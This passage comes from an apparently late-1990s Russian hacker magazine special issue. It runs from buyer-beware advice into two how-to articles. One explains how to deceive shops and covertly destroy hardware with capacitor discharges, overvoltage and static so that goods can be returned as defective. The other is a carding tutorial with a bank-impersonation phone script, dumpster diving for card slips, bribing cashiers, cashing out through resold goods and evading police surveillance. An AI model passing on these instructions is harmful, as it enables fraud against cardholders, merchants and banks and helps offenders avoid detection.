Но не процессором единым жив компьютер. Кроме данного девайса, существуют и другие, и хотя их не “гоняют”, но подставить на них могут. Про “мамы”, “видюхи” и “винты” многого не скажешь — все это легко проверить. А вот сидюки не всегда так же легко проверить. Вообще-то, это явный обман, но доказать его очень сложно. Есть такие CD-ROM’ы, скорость которых определить достаточно сложно. То есть Windows определяет только модель (многие люди могут по модели определить скорость, но не все такие), некоторые тесты показывают противоречивые результаты: то это 2-х скоростной CD-ROM, а по другому тесту — 24-х скоростной и т.д. Единственная отличительная черта — это надпись на “морде” сидюка, но эта “морда”, как назло, очень легко снимается. Так вот, обман заключается в следующем. Берется два сидюка (предположим, 32 и 40 скоростные), у них меняются “морды”. При покупке компьютера ты выбрал 40 скоростной сидюк, и ты его получишь, по крайней мере, ты будешь уверен, что это так, а особой разницы между 32 и 40 скоростями ты все равно не заметишь. Но это еще не все: на этот привод “забудут” повесить стикер (это специальная наклейка, которую нельзя оторвать и по которой осуществляется гарантия), и когда ты заметишь подлог, то изменить ничего не сможешь, так как продавец будет утверждать, что он такого не делал, сделать не мог, да и вообще это сделал ты и сейчас тебя вообще в тюрьму отправят. В данном случае сделать что-либо действительно сложно, но при покупке следует быть внимательным. Попроси продавца снять крышку с системного блока, лично осмотри все “внутренности”, проверь наличие стикеров (если где-то их не обнаружил, попроси наклеить еще один) и сверь все серийные номера с номерами в гарантийном талоне. Это, конечно, не панацея, но все-таки будет надежнее. Продавцы не любят, когда их просят проверить компьютер или снять крышку с системного блока, но отказать тебе они не имеют права. Как правило, фирма об обманах ничего не знает — все это личная инициатива продавца или сборщика, но тебе-то от этого не легче. Но вообще, при покупке компьютера следует быть очень внимательным, так как хотя на открытый обман продавцы решаются в редких случаях, но вот “подводных камней” будет достаточно. Перечислить все — просто невозможно, ибо с каждым покупателем может произойти что-то новое (наша торговля так изобретательна!), но вот характерные примеры я привел. Что касается комплектующих, то тут все проще: продавцы подавляют тебя интеллектом и просто вынуждают купить то, что им выгодней продать. Я мог бы привести массу примеров, но все они сводятся к простому психологическому воздействию. Когда ты приходишь в магазин, то подсознательно чувствуешь, что продавцы — добродушные высококвалифицированные люди, как правило, так и есть, но нет правила, в котором не было бы исключения. Самый лучший компьютер — компьютер, собранный своими руками. Только в этом случае ты поймешь, что зачем. Да и потом сам процесс покупки комплектующих очень приятен. Ты представляешь себе, как будет выглядеть твой компьютер, какой у него будет корпус, что будет внутри и как это все будет замечательно работать. И, поверь мне, это захватывающее чувство. И это действительно будет самый лучший компьютер. И совсем не обязательно это самый мощный системный блок и самый лучший монитор, просто это ТВОЙ КОМПЬЮТЕР.


Спецвыпуск хакер, номер #001, стр. 001-044-4, Как кидают лохов при покупке компьютеров

Как кидают лохов при покупке компьютеров

Спецвыпуск хакер, номер #001, стр. 001-044-4

Итоги:

1. Перед тем, как решиться на покупку компа, спроси своих друзей-профессионалов, какую конфигурацию тебе нужно брать.

2. Запиши все названия комплектующих, которые тебе посоветуют друзья. И в магазине покупай только их, а не ту шнягу, что попытаются тебе впарить.

3. В магазине скажи продавцу: “Да, да, да... Все это я знаю. А теперь заткнись и слушай меня. Мне нужно это, это и это”.

4. Когда тебе принесут комп, скажи продавцу, чтобы он снял крышку корпуса и тщательно посмотри на все детали внутри. На всех них должны стоять гарантийные стикеры.


Спецвыпуск хакер, номер #001, стр. 001-044-5, Как кидают лохов при покупке компьютеров

Как кидают лохов при покупке компьютеров

Спецвыпуск хакер, номер #001, стр. 001-044-5

5. Если тебе предложат купить крутой и суперкачественный Compaq или Dell или что-нибудь в этом духе, посылай продавца вместе с его советами в далекую галактику — от таких сделок выиграет только магазин, т.к. через год тебе придется покупать у них новый комп.

6. Не верь рекламе. Реклама — фуфел, ее задача — заманить тебя в магазин. Лучше поспрашивай знакомых, где они покупали свои компы.


Спецвыпуск хакер, номер #001, стр. 001-047-1, Теперь ты будешь

Теперь ты будешь

апгрейдиться нахаляву

Спецвыпуск хакер, номер #001, стр. 001-047-1

Игорь Ломовой

Прогресс — дело хорошее и временами даже нужное. Еще вчера мы играли в игры, где треугольник гонялся за квадратом, а герои RPG состояли, в лучшем случае, из 100 точек. Еще 2 года назад казалось, что двух гигабайтный диск и забить-то нечем, а сегодня....

Но у этого же прогресса и у этой же пресловутой научно-технической революции есть и неприятная сторона. Дело идет к тому, что железо устаревает быстрее, чем нам хотелось бы. Иной раз купишь себе железяку, пока то да се, распакуешь, подключишь, еще и побаловаться ею как следует не успел, а она уже полное барахло, можно старьевщику сдавать.

Выкладывать каждый год по

штуке грина на апгрейд как-то в лом. А с другой стороны, хочется и машину помощнее, видеокарту побыстрее, да и мониторчик поквадратней, чтоб все было «как у людей».

Казалось бы, хочешь хорошую машину — плати деньги. Устарела машина — покупай новую. Но это не наш путь. Это у них там, за бугром, деньгами швыряют налево и направо, а нам бы как-нибудь так, чтоб у нас все было, а нам за это ничего не было. Политики нас уверяют, что мы живем в правовом государстве. Очень хорошо! Ведь в правовом государстве — покупатель всегда прав, особенно, если он хорошо выучил Закон о защите прав потребителя. Этим-то законом мы и воспользуемся. И научим тебя, приятель, как сдавать ненужное железо обратно в магазин, получая при этом свои денежки обратно.

Все очень просто. Наша цель — купить компьютер, периферию или комплектующие, какое-то время попользоваться ими, а потом обменять на более современное оборудование или вернуть устаревшее барахло назад в магазин и получить свои деньги обратно.

«Автостоп»

для хакера

Выгода очевидна. Пример: купив год назад Monster на Voodoo 2, ты потратил $150. Сдав через год этот же Monster назад в магазин, ты получишь свои $150, но на них сможешь уже купить Monster2 на чипсете Voodoo2 и т.д. Во всем мире, как, впрочем, и в России, имеется целый класс юзеров, которые вообще не платят за модернизацию своих компьютеров. Они правдами и неправдами сдают устаревшее железо обратно в магазин и получают свои кровные назад. Для многих это стало своего рода хобби, что-то вроде автостопа. Нужно как можно дольше продержаться, не тратя на апгрейт ни копейки, и собрать как можно более крутую машину.

Способ №1.

Система Money Back

в действии!

Дело в том, что в большинстве западных магазинов действует система Money Back. То есть можно купить товар и на законных основаниях вернуть его в течение определенного времени (как правило, срок 2 недели), если он тебе по какой-либо причине не подошел. Причем причины могут быть самые разные и самые простые: не понравился цвет, собирает много пыли, громко шумит, вообще не шумит или тебя , например, раздражает горящая лампочка Power :). Некоторые российские магазины, подражая неразумным западным коллегам, то ли по наивности, а скорее по глупости, тоже ввели подобную систему. Если ты нашел такой магазин, беги скорее туда. Например, тебе требуется сканер. Ну, зачем же выкидывать свои деньги, если сканер тебе нужен всего-то на 5 дней (отсканить фотки, снятые скрытой камерой около твоей кровати :)). Займи у друга денег (при отсутствии друга можно получить нужную сумму, сдав в ломбард мамины золотые украшения, папину машину, откопать бабушку и выдрать у нее золотые зубы). Потом покупаешь сканер, делаешь свою работу и возвращаешь сканер обратно в магазин. При возврате ты, с лицом воспитанника института благородных девиц, объяснишь, что сканер не подходит к твоему компьютеру.


Спецвыпуск хакер, номер #001, стр. 001-047-2, Теперь ты будешь

Теперь ты будешь

апгрейдиться нахаляву

Спецвыпуск хакер, номер #001, стр. 001-047-2

Но такие магазины — большая редкость, да и не всегда в них есть то, что тебе нужно. Но, на самом деле, подобную операцию можно легко провернуть практически в любом магазине. На это существует способ №2

Способ №2.

Прикинься лохом!

Дело в том, что система Money Back была долгое время обязательной для продавцов и в России. Согласно Закону о защите прав потребителя ты мог вернуть любой товар в течение 2 недель обратно, если он по каким-либо причинам тебя не устроил. Но 19 января 1998 года наше мудрое правительство приняло Постановление №55, в котором причислило компьютеры, комплектующие и периферию к товарам, которые не подлежат обмену или возврату в случае, если они надлежащего качества. (См. врезку)

Конечно, об этом Постановлении знают все продавцы и, услышав твою просьбу о возврате работающего товара, с удовольствием процитируют этот откровенно свинский документ. Но соблюдение нескольких простых правил позволит тебе все-таки добиться своего вопреки существующему закону. В основе этих правил — тактика изматывания и устрашения продавца.

Правило №1.

Выбор магазина

Мы советуем делать покупки в мелких и средних фирмах. Там мало бюрократии, формализма и волокиты, поэтому любые вопросы можно быстро решить на месте. Да и до директора фирмы, если что, добраться не трудно. К тому же мелкие и средние фирмы, как правило, торгуют с многочисленными нарушениями. Часто у них отсутствуют сертификаты соответствия и инструкции на русском языке (по закону эти документы они обязаны предоставить покупателю). Как правило, они не проверяют товар при продаже (хотя обязаны это делать), говоря, что они и не припомнят, когда у них были бракованные изделия. Скорее всего, у них есть проблемы с арендой помещения, с кассовым аппаратом, бух. учетом и уплатой налогов. Резона афишировать свою деятельность у них нет. Поэтому все возникающие проблемы они предпочитают решать на месте, не доводя дело до огласки и привлечения правоохранительных органов. Всем этим-то мы и воспользуемся.

Правило №2.

Процедура покупки

Желательно придти в магазин с другом (возможно, он выступит в роли свидетеля в дальнейшем). При покупке прикинься полным лохом. Задай продавцу 20-30 глупых вопросов. Твоя задача: показать, что ты очень придирчиво и щепетильно относишься к покупке. В конце разговора продавец должен считать тебя очень противным и придирчивым покупателем и при этом глупым и неграмотным. К тому же он должен надолго запомнить твой визит. Выбрав, наконец-то, то, что тебе нужно (например, тот же сканер), несколько раз спроси, подойдет ли он к твоему компьютеру. Объясни, что до этого ты покупал 2 сканера, и они не подошли. Продавец, устав от твоей тупости, скажет, что, конечно же, он подойдет. На просьбу проверить сканер он ответит, скорее всего, отказом (проверять сканер в магазине будет только сумасшедший). Вот это-то тебе и нужно. Поинтересуйся, можно ли вернуть сканер, если он не подойдет. Продавец, скорее всего, согласится, понимая, что сканер не может не подойти, и надеясь, что у тебя все будет в порядке. Все! Наше грязное дело сделано.


Спецвыпуск хакер, номер #001, стр. 001-047-3, Теперь ты будешь

Теперь ты будешь

апгрейдиться нахаляву

Спецвыпуск хакер, номер #001, стр. 001-047-3

Правило №3.

Оформление документов

При покупке не забудь оформить все необходимые документы: кассовый чек и гарантийный талон. Без них тебе не удастся предъявить никакие претензии. Поинтересуйся, есть ли инструкция на русском и сертификат соответствия. Если их нет, то это тоже тебе на руку.

Правило №3.

Возврат товара

Через несколько дней (не следует тянуть более 7–10 дней ) ты можешь смело топать в магазин и возвращать товар. Придя в магазин, желательно попасть на того же продавца. Грустно улыбнувшись, скажи, что тебе опять не повезло, сканер не подошел, и ты хотел бы оформить возврат. Пожалуйся, что, скорее всего, дело в твоем компьютере, который плохо сконфигурирован. Напомни, что ты предупреждал о возможных проблемах и что продавец обещал оформить возврат, в случае чего. Скорее всего, продавец согласится, с ужасом вспомнив тебя и не желая выслушивать твое нытье. Если продавец заупрямится и начнет отпираться от своих слов о возврате, скажи, что у тебя есть свидетель. Припомни отказ проверить технику, отсутствие инструкции и сертификата (если они отсутствовали). Объясни, что ты твердо знаешь свои права и будешь добиваться своего до упора. Попроси, чтобы вызвали директора. Спокойным, уверенным голосом объясни ему, что в случае отказа ты обратишься в Суд, Мосторгинспекцию, Антимонопольный комитет, Налоговую инспекцию и Общество по защите прав потребителя. И они рассудят ваш спор. Намекни, что у тебя уже есть опыт подобных дел. Любой уважающий себя человек не станет с тобой пререкаться и выполнит все условия, лишь бы больше не видеть и не слышать тебя, а, тем более, эти доблестные организации. Дело сделано, забирай свои деньги. Кстати, если в случае отказа ты решишь обратиться в суд, то дело ты, скорее всего, выиграешь, в виду многочисленных нарушений закона со стороны продавцов. К тому же суд практически всегда на стороне покупателя в спорных случаях, так как судьи сами покупатели и торгуют лишь иногда собственной совестью.

Способ №2 имеет один большой недостаток. Срок возврата товара ограничен 7–10 днями. Иначе продавцы справедливо спросят, почему же ты не пришел раньше, и заподозрят подвох. В большинстве случаев нас это не устроит. На это у нас заготовлен способ №3.

Способ №3.

Сохрани свой капитал, делая откровенные

гадости

Итак, ты не хочешь менять любимые железки каждые две недели. OK. Ты сможешь поменять или вернуть их в течение всего гарантийного срока. Выше рассматривались лишь те случаи, когда товар сдается в рабочем состоянии. Их вернуть и обменять труднее всего. С бракованными и неисправными товарами все намного проще. Их ты можешь обменять или вернуть в течение всего гарантийного срока на основании Закона о правах потребителя, ст. №18 (смотри врезку). Осталась самая малость — сделать твой продукт нерабочим. Точнее говоря, сломать его так, чтобы продавец не понял, что это сделали ты.


Спецвыпуск хакер, номер #001, стр. 001-047-4, Теперь ты будешь

Теперь ты будешь

апгрейдиться нахаляву

Спецвыпуск хакер, номер #001, стр. 001-047-4

Как видно из Закона, здесь есть огромные просторы для деятельности: мы можем отремонтировать товар, обменять товар на аналогичный, поменять на новый. Все в наших руках. Труднее всего добиться возврата денег. В Законе указано, что расторжение договора купли-продажи возможно только при наличии существенных недостатков. Что такое существенные недостатки, тоже указано в Законе (см. врезку). Как видишь, определение довольно расплывчатое. Под него подпадает практически любое несоответствие продукта поставленным задачам. Например, покупая сканер, ты рассчитывал на определенное качество получаемой картинки. Поработав на нем, ты понял, что на самом деле сканер выдает вовсе не то качество, на которое ты рассчитывал. А это как раз подпадает под определение «Существенный недостаток».

Таким образом, ты легко сможешь вернуть неработающий товар назад. Правда, ты опять-таки должен будешь следовать всем правилам, указанным в способе №2. Если продавец предложит отремонтировать или обменять товар на аналогичный, не соглашайся ни в коем случае! Скажи, что после поломки ты не доверяешь этому продукту, а о покупке другого ты еще подумаешь и определишься позже. Поэтому будет лучше, если тебе вернут деньги. Помни, твоя сила в том, насколько серьезно и убедительно будут звучать твои аргументы и насколько серьезными покажутся твои претензии и угрозы. Учти, что доводить дело до суда — не лучшее решение (сложная процедура, отнимает много времени и сил. Но это не значит, что не нужно угрожать судом :)). В любом случае, попытайся решить все на месте.

Маленькое напоминание: так как все расчеты на территории России производятся в рублях, то и деньги свои ты получишь в деревянных. Есть шанс пролететь при высокой инфляции. Пример. Год назад ты отхватил видеокарту за 600 рублей ($100), сегодня ты решишь ее вернуть. Ты получишь на руки те же 600 рублей, но по сегодняшнему курсу это всего-навсего $26. Так что остается только надеяться на скорейшую финансовую стабилизацию. Если вам захотелось воспользоваться нашими советами, обязательно загляните на сайт www.spros.ru. Там лежит куча информации о защите прав потребителя, все законы и нормативные акты, образцы заявлений и адреса компетентных органов. есть специальная страничка, посвященная обмену и возврату компьютеров. Удачи!

УТВЕРЖДЕН

Постановлением

Правительства

Российской Федерации

N 55 от 19 января 1998 года

ПЕРЕЧЕНЬ

товаров длительного пользования, на которые не распространяется требование покупателя о безвозмездном предоставлении ему на период ремонта или замены аналогичного товара

1. Автомобили, мотоциклы и другие виды мототехники, прицепы и номерные агрегаты к ним, кроме товаров, предназначенных для использования инвалидами, прогулочные суда и плавсредства.


Спецвыпуск хакер, номер #001, стр. 001-047-5, Теперь ты будешь

Теперь ты будешь

апгрейдиться нахаляву

Спецвыпуск хакер, номер #001, стр. 001-047-5

2. Мебель.

...

11. Технически сложные товары бытового назначения, на которые установлены гарантийные сроки (станки металлорежущие и деревообрабатывающие бытовые; кухонное оборудование; электробытовые машины и приборы; бытовая радиоэлектронная аппаратура; бытовая вычислительная и множительная техника; фото- и киноаппаратура; телефонные аппараты и факсимильная аппаратура; электромузыкальные инструменты; игрушки электронные).

Статья 18. Последствия продажи товара ненадлежащего качества

1. Потребитель, которому продан товар ненадлежащего качества, если оно не было оговорено продавцом, вправе по своему выбору потребовать:

- безвозмездного устранения недостатков товара или возмещения расходов на их исправление потребителем или третьим лицом;

- соразмерного уменьшения покупной цены;

- замены на товар аналогичной марки (модели, артикула);

- замены на такой же товар другой марки (модели, артикула) с соответствующим перерасчетом покупной цены;

- расторжения договора купли-продажи. При этом потребитель обязан возвратить товар с недостатками. При этом потребитель вправе потребовать также полного возмещения убытков, причиненных ему вследствие продажи товара ненадлежащего качества. Убытки возмещаются в сроки, установленные настоящим Законом, для удовлетворения соответствующих требований потребителя.

В отношении технически сложных товаров требования потребителя, указанные в абзацах четвертом — шестом настоящего пункта, подлежат удовлетворению в случае обнаружения в товарах существенных недостатков. Перечень таких товаров утверждается Правительством Российской Федерации.

Существенный недостаток товара (работы, услуги) — недостаток, который делает невозможным или недопустимым использование товара (работы, услуги) в соответствии с его целевым назначением, либо который не может быть устранен, либо который проявляется вновь после устранения, либо для устранения которого требуются большие затраты, либо вследствие которого потребитель в значительной степени лишается того, на что он был вправе рассчитывать при заключении договора;

Как убить железо

Ну и, наконец-то, несколько советов о том, как незаметно испортить некоторые компьютерные комплектующие.

Довольно много способов убить материнскую плату. Самый простой из них — отключить питание при перепрошивке Flash BIOS. Результат гарантирован.

Универсальный способ — подать повышенное напряжение на разъемы микросхем (метод годится для любых плат).

1. Для этого берешь конденсатор и два провода. Конденсатор обязательно не электролитический, напряжение 400-500 вольт, емкостью 0,25-1 мкФ (можно применить конденсатор от ламп дневного света).

2. Заряжаешь конденсатор от сети (напоминаем, конденсатор не электролитический).

3. Присоединяешь провода к паре любых площадок на контроллере.

4. Прикасаешься проводами к конденсатору.

5. Повторить пару раз. :)

Если прикасаться к контактам микросхемы проводами, уже подсоединенными к конденсатору, то на плате могут остаться следы разряда.


Спецвыпуск хакер, номер #001, стр. 001-047-6, Теперь ты будешь

Теперь ты будешь

апгрейдиться нахаляву

Спецвыпуск хакер, номер #001, стр. 001-047-6

Жесткий диск требует иного подхода. Запусти приложение, активно обращающееся к винту, затем поверни винт на 45 градусов и не сильно постучи. Головки должны поцарапать поверхность. При необходимости повторить процедуру. Можно также взять источник тока от 6 до 12 вольт и подключить к разъему 5 В на диске. Постепенно увеличивай напряжение по 1–1.5 V, ждешь 1 минуту. Если диск живой, продолжай увеличивать напряжение. Неплохой способ — потрясти работающий диск.

Видеоплаты с TV выходом легко умирают при втыкании и вытыкании провода, соединяющего TV с картой. Естественно, при включенном компе. Нужно быстро повторять процедуру раз 10 подряд.

Универсальный способ — использовать статическое электричество. Потри плату о шерстяной свитер. Иногда тереть приходится очень долго. :) Однако этот метод отлично работает на ОЗУ.

Звуковые платы самые живучие. Попробуй метод со статикой и с конденсатором.

Мониторы портить не рекомендую. В каждом мониторе практически всегда есть дефекты изображения: несведение, плохая геометрия. Тебе останется доказать, что данный монитор не удовлетворяет твоим требованиям и не решает поставленных задач (скажи, что ты работаешь с полиграфией, в журнале по защите прав потребителей «Спрос» :)).

Ну и хватит на сегодня, пожалуй. А то сейчас весь компьютер испоганишь. Но в ближайших номерах мы продолжим публикацию методов «убийства» разного железа.

Мы будем очень рады, если ты пришлешь нам свои способы.


Спецвыпуск хакер, номер #001, стр. 001-050-1, 100% СКИДКА на получение кредитной карты

100% СКИДКА на получение кредитной карты

Спецвыпуск хакер, номер #001, стр. 001-050-1

Сергей Покровский (pokrovsky@xakep.ru)

Кардинг... Как много в этом слове для сердца русского слилось. Как много в нем отозвалось! Да, да, да, друзья мои. Именно кардингом мы сегодня и займемся. Всем известно, что Россия не особо блещет популярностью юзанья кредитных карточек, а попользоваться ими хочется, а порой это просто необходимо! Ну, признайся, ведь хочется иногда заглянуть на порносервер, да не краем глазика, а широко раскрыв свои глазищи (чтоб, ни дай Бог, чего-нибудь не пропустить), да еще и качнуть оттуда на свой винчестер мегабайта эдак на два. Да не вопрос!

Для начала давай-ка разберемся, что такое «кардинг». В общем, это — незаконное использование кредитных карточек для покупки товаров или услуг. Вот так все просто. Эта отрасль хакерского ремесла очень полезна, особенно для тех из вас, кто сидит без работы, без стипендии и т.д. Занимаясь кардингом, можно либо получить информацию о реальной карте, либо сгенерировать все эти данные, но так, что все системы будут принимать ее за реальную. Я расскажу и о первом, и о втором вариантах. Только не надо думать, что, прочитав эту статью, ты сразу станешь крутым кардером. Конечно, эта статья не для профессионала, а для новичка, который не знает, как получить и использовать кредитную карточку хакерским стилем.

Итак, начнем с реальных карт.

Первая вещь, которую ты должен сделать, — это получить всю информацию о карте. Самый простой способ — пойти в местный магазин, который использует кредитные карточки. Покрутись вокруг магазина и посмотри, куда они выкидывают мусор. Запомни, мусор для мошенника — одно из главных средств получения информации. После того как они выкинули весь хлам из магазина, быстро иди и забирай его. Никто не гарантирует, что ты там найдешь хотя бы один номер карты, но, с другой стороны, есть очень большая вероятность, что в бумагах будет много полезной информации. А если тебе повезет, то — и слипы от карточек или отчетности бухгалтера по принятым карточкам, который допустил ошибку и выкинул документ, не рвя его на мелкие кусочки. Я знаю, копаться в мусоре — дело не царское. Зато, если удача окажется на твоей стороне, то ты будешь щедро вознагражден. Зачем же придумывают всякие варварские уничтожители документов? Да в любом агентстве, консультирующем по вопросам безопасности, тебе скажут, что мусор — самый простой способ узнать чужие тайны.

Ты слишком горд, чтобы копаться в мусоре? ОК, тогда для тебя способ №2.

Используй психологию! Очень часто, когда какому-нибудь владельцу кредитной карты звонят из банка, сообщая об ошибке в базе данных с его картой, это оказывается вовсе не банковский работник, а хакер Вася.

Запомни, в мире существует 4 страсти, ради которых люди теряют голову: секс, власть, деньги и любовь. В кардинге обычно используют страсть к деньгам. Итак, каждый человек трясется за свои денежки, особенно за крупные суммы. Система проста, как все гениальное. Звонят какому-нибудь перцу, и с ним получается вот такой диалог.

Ты: Добрый день. Это Иванов Иван?

Он: Да.

Ты: Вас беспокоит Фрик Хакович Хакеридзе из кредитно-кассового отдела банка «Национальный Кредит». Через нас прошел счет, в котором говорится, что вы в один день совершили покупку по кредитной карте на сумму 8000$. Нам нужно ваше подтверждение на такую крупную сумму операции.


Спецвыпуск хакер, номер #001, стр. 001-050-2, 100% СКИДКА на получение кредитной карты

100% СКИДКА на получение кредитной карты

Спецвыпуск хакер, номер #001, стр. 001-050-2

Он: Да вы с ума сошли??? Я не покупал ничего на 8000 баксов!

Ты: Понятно. Значит, либо мы ошиблись, либо кто-то незаконно использует вашу карточку. Вы точно не делали такой покупки 1 января?

Он: Да я уже сказал, нет! Это какая-то ошибка!!!

Ты: Хорошо. Мы сейчас проверим. Продиктуйте, пожалуйста, номер вашей карты.

Он: 1234567890123456.

Ты: И дату окончания действия.

Он: Ноябрь 99.

Ты: Спасибо. Мы проверим. Пожалуйста, не делайте никаких покупок по этой карте в течение сегодняшнего дня.

Он: Хорошо. Большое спасибо. Когда выясните, перезвоните мне, пожалуйста.

Ты: Конечно. До свидания. Извините за беспокойство.

Вот тут есть некоторые тонкости. Во-первых, если тебе 12 лет, то и не стоит этим заниматься. Тебя просекут сразу же! Лучше попроси своего старшего брата или приятеля. Во-вторых, возможно, этот человек не такой уж лох, как ты думаешь. Он может спросить номер твоего телефона, чтобы самому тебе перезвонить, проверив тем самым, действительно ли ему звонят из банка.

Но, возможно, что ты не только боишься замарать свои ручонки, но и совершенно не умеешь разговаривать по телефону. Ну, не научила тебя мама, ну что ж поделать? Остается одно — применить способ №3.

Многие пытаются найти какую-нибудь подругу, которая работает в супермаркете или магазине, принимающем кредитные карточки. Когда карточка проходит через кассира, то ее прокатывают в специальной машинке, и выдается 2 слипа (чека с информацией о карте и покупке). Первый слип отдается клиенту, а второй остается в магазине и потом направляется в банк, чтобы тот его оплатил. Кардер пытается договорится с кассиром, чтобы он давал номера карточек со слипов. Но, за 98 год, УЭП, занимающийся кардерами, задержал более 40 кассиров, именно за такие операции. Поэтому сейчас, такую лохушку найти будет очень тяжело.

ОК. Карта у тебя есть. Имя на карте и дату окончания действия ты знаешь. Что делать дальше? Дальше начинается следующий процесс работы, и это еще не сладостный миг удачи. Можно накачать себе из Интернета кучу платного софта. Это если ты не знаешь, что такое «Горбушка», и у тебя супер-пупер скорость подключения. Можно с помощью этой карточки открыть себе доступы на порносерверах. Это для тех, у кого подружка — компьютер. Если тебе и в жизни секса хватает, то твоя задача — вытащить из карты как можно больше наличных. Делается это так: ты заказываешь какой-нибудь товар, получаешь его и сразу же продаешь. Никогда не оставляй себе никакой товар. Этим ты только упростишь работу милиции, когда они придут к тебе знакомиться. Когда хозяину карточки придет счет, он позвонит в банк и скажет, что не делал такого заказа. После всех разборок карточку заблокируют. Но! Не думай, что они просто убьют счет. Они будут отслеживать попытки заказов по заблокированной карте. Еще один совет: кредитная карта называется «кредитной» потому, что для нее есть некоторая сумма, которой банк безоговорочно верит. То есть, если заказ не превышает эту сумму, то банк АВТОМАТИЧЕСКИ считает, что такая сумма есть на карте, и в случае, если ее там не окажется, банк сам покроет расходы. Поэтому система проверки заказов, не превышающих эту сумму, упрощена. Я понимаю, что ты сразу же захочешь заказать 20-Гигабайтный винт или что-то в этом роде, но вот этого-то делать и не стоит. Павел Шейко, например, тоже заказывал себе кучу компьютерных примочек, а теперь мотает свои 5 лет.


Спецвыпуск хакер, номер #001, стр. 001-050-3, 100% СКИДКА на получение кредитной карты

100% СКИДКА на получение кредитной карты

Спецвыпуск хакер, номер #001, стр. 001-050-3

Где заказывать? Ну, конечно же, в Интернете! Найди какой-нибудь сервер, который обслуживает кредитные карты. Постарайся найти не самый популярный сервер. Например, на «BuyDirect» у тебя такие вещи не пройдут. А вот какая-нибудь не очень распространенная звукозаписывающая компания, обещающая быструю доставку, с удовольствием продаст тебе парочку музыкальных CD. Никогда не заказывай в России! У нас, к сожалению, еще не так сильно распространена система оплаты кредитками, зато хаканье кредиток является народным творчеством, и поэтому к каждой покупке по кредитке относятся слишком серьезно. Есть большая вероятность, что перед тем, как тебе что-то отправят, номер кредитки проверят сто раз, да еще и дождутся, когда банк переведет им сумму твоего заказа. В Штатах и других буржуйских странах все намного проще. Чаще всего там дорожат своей репутацией, а так как скорость обслуживания клиентов — одна из главных характеристик хорошей компании, то там отправляют заказ сразу же, проверив только, существует ли такая карта в природе и есть ли на ней такая сумма.

А вот теперь начинается самая трудная часть. На какой адрес заказывать? Можешь заказать на свой. Тогда, открыв посылку, вместо своего заказа ты там увидишь десять ОМОНовцев, которые почти дружелюбно предложат тебе примерить новую модель модных браслетов.

Совет №1:

Когда ты будешь проверять почтовый ящик, всегда сначала обойди вокруг и присмотрись, не наблюдает ли кто-то со стороны. Если ты заметишь, что за тобой следят, ни в коем случае НЕ БЕГИ!!! Это распространенная ошибка. Просто пройди мимо спокойной походкой и никогда больше туда не возвращайся.

Совет №2:

Когда ты заберешь квитанцию или товар, возвращайся домой окольными путями. Пусть ты доберешься до дома за 4 часа, а не за 20 минут, зато ты узнаешь, следят за тобой или нет.

Совет №3:

Когда будешь получать товар у человека или приятеля, не говори с ним о заказе вообще. И ОБЯЗАТЕЛЬНО расплатись с ним сразу же! Разговор должен быть таким: «Принёс?» — «Да. Держи» — «ОК. Вот тебе столько-то баксов. Спасибо. Пока». Разворачивайся и уходи. Никакого обсуждения того, как и откуда ты ее заказал, быть не должно.

Совет №4:

Если тебя схватили за руку, когда ты получал товар от друга или человека, не паникуй! Если во время передачи посылки ты придерживался предыдущего совета, то можешь запросто сказать, что ты это у него покупал и не понимаешь, в чем здесь криминал?

А для тех из вас, кто не собирается заказывать ничего ощутимого, и единственное, что ему нужно — это подсадить свой модемчик загрузкой лицензионного софта или надпись «Welcome, member!» на порносервере, раздел о генерации номеров карточек. Давай-ка для начала поймем саму кредитку. Что она в себе скрывает? Итак, номер кредитной карты обычно состоит из 16 цифр, хотя существуют карты и с 13-ю цифрами. Первая цифра определяет, к какому типу относится карта: 5 — MasterCard, 4 — VISA, 3 — American Express. Следующие 3 цифры определяют, к какому банку относится карта. Далее следуют цифры, идентифицирующие саму карту, и последняя цифра является контрольной. Контрольная цифра — это результат определенных математических операций со всеми предыдущими цифрами. Таким образом проверяется, действительно ли это номер кредитки или просто набор цифр «от балды». Вот этим то алгоритмом и пользуются кардгенераторы — специальные программки, готовые по первому твоему требованию выдать огромный список номеров, принадлежащих заданному тобой банку. Но вот только имя на карте и дату окончания действия карты эти программки узнать-то не могут! И если еще года 3-4 назад одного только номера было достаточно, то теперь любой системе проверки карт потребуется вся информация. Компьютеры совершенствуются. Раньше они проверяли только номер, сверяя контрольную цифру, а теперь подключаются к базе данных на www.800.com, где сверяют и имя, и дату окончания действия. :( Хотя, говорят, в Сети еще остались серверы, на которых стоят старые системы проверки, и там можно зарегистрироваться, введя абсолютно левое имя и любую дату. Большинство обычных пользователей Сети получает номер кредитки как раз от кард-генераторов. Правда, потом они полдня ищут сервер, который пропустит эту лажу. Но если ты захочешь пользоваться сгенерированным кодом, то не забудь, что большинство этих программок написано на Visual Basic, а поэтому, если у тебя не 98-й Windows, то тебе необходимо будет качнуть библиотечки: VB40032.DLL, MSVBVM50.DLL, VBRUN300.DLL.


Спецвыпуск хакер, номер #001, стр. 001-050-4, 100% СКИДКА на получение кредитной карты

100% СКИДКА на получение кредитной карты

Спецвыпуск хакер, номер #001, стр. 001-050-4

Счастливого хакинга!

P.S.: Да, чуть не забыл!

Предупреждение! Занимаясь хакерством, ты нарушаешь закон. На самом деле, всё не так уж просто, как кажется. Я раньше тоже думал, что в нашей стране кардингом можно заниматься спокойно, но когда мы пытались встретиться в тюрьме с Гофманом (сидит в СИЗО), нам пришлось столкнуться с УЭПовцами. Поверь мне, приятель, это далеко не лохи. Я вкорне переменил своё мнение о них, когда столкнулся с ними лицом к лицу. Это профессиональные ребята, и у них есть специальная группа, которая занимается кардерами. К сожелению, занимаются они этом очень успешно. В 98 году они взяли несколько кардерских групп и более 40 человек. А это ведь, только Москва! Вообщем, подумай трижды, прежде чем заняться кардингом.

Статья 159. МОШЕННИЧЕСТВО

1. Мошенничество, то есть хищение чужого имущества или приобретение права на чужое имущество путем обмана или злоупотребления доверием, — наказывается штрафом в размере от двухсот до семисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до семи месяцев, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от четырех до шести месяцев, либо лишением свободы на срок до трех лет.


Спецвыпуск хакер, номер #001, стр. 001-050-5, 100% СКИДКА на получение кредитной карты

100% СКИДКА на получение кредитной карты

Спецвыпуск хакер, номер #001, стр. 001-050-5

2. Мошенничество, совершенное:

а) группой лиц по предварительному сговору;

б) неоднократно;

в) лицом с использованием своего служебного положения;

